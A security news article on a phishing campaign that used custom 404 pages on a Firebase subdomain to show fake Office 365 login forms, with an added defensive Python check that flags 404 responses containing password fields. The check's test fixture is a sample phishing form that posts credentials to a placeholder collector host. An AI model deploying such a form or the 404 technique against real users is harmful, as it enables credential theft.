Custom 404 Pages Used to Serve Fake Microsoft Office 365 Login Forms

By Richard Anderson

A new phishing campaign has been detected by security researchers at Microsoft that uses custom 404 pages to display a fake Office 365 login form.

The campaign uses a single domain whose custom 404 page displays the fake Office 365 login form. That page is returned whenever a visitor requests a non-existent page on the site, and since any URL can be made to trigger it, the attackers have an endless supply of phishing URLs to use in their campaign.

The landing pages used in this phishing campaign are virtually indistinguishable from genuine Microsoft login pages. All links on the page direct the user to the genuine Microsoft sites to add authenticity. The attackers harvest Office 365 credentials when they are entered into the fake login form. The user is then redirected to a genuine Microsoft site.

The attackers used a Microsoft-related domain name on a free Firebase subdomain. Firebase allows a custom 404 page to be set, which is displayed to any visitor who requests an incorrect or broken URL. There are several other ways of creating custom 404 pages, so this campaign could be replicated on other platforms.
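A defensive check for the technique described above, added here as an example and not code from the article or from Microsoft: a genuine "page not found" response has no reason to ask for a password, so a 404 status combined with a password field in the body is a strong signal. The sample responses are constructed, and the collector host name is a placeholder.

```python
"""Flag 404 responses that carry a credential-entry form (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collects <form> actions and counts <input type="password"> fields."""

    def __init__(self):
        super().__init__()
        self.form_actions = []      # action attribute of each <form>
        self.password_fields = 0    # number of password inputs seen

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1


def is_suspicious_404(status, body):
    """Return (flag, form_hosts).

    flag is True when the response status is 404 and the body contains a
    password input, which is the signature of the custom-404 phishing
    technique regardless of which path was requested.  form_hosts lists
    the hosts the page's forms post to, for logging and blocklisting.
    """
    scanner = _FormScanner()
    scanner.feed(body)
    hosts = sorted({urlparse(a).netloc for a in scanner.form_actions
                    if urlparse(a).netloc})
    return (status == 404 and scanner.password_fields > 0), hosts


# Constructed sample responses; collector.example is a placeholder host.
BENIGN_404 = "<html><body><h1>404 Not Found</h1><a href='/'>Home</a></body></html>"
PHISH_404 = ("<html><body><form action='https://collector.example/post' method='post'>"
             "<input name='loginfmt' type='email'>"
             "<input name='passwd' type='password'></form>"
             "<a href='https://www.microsoft.com/'>Privacy</a></body></html>")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_404), ("phish", PHISH_404)):
        flag, hosts = is_suspicious_404(404, body)
        print(f"{name}: suspicious={flag} form_hosts={hosts}")
```

In practice the check is run against the body returned for a deliberately random path on the suspect host, since the signal does not depend on which non-existent page was requested.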

Microsoft has already marked the domain as malicious

Microsoft has blacklisted the domain and is blocking phishing emails that link to it through its Advanced Threat Protection (ATP) offering for Office 365. Google has yet to mark the domain as potentially malicious. Once the domain is blacklisted, the attackers will likely switch to another domain and continue the campaign.

To ensure that phishing emails such as these are not delivered to end users’ inboxes, businesses need to implement advanced phishing defenses, whether Microsoft ATP or a third-party anti-phishing solution layered on top of Office 365. It is also important to ensure that the workforce is prepared and has been trained to identify phishing emails and other threats.


Richard Anderson is the Editor-in-Chief of NetSec.news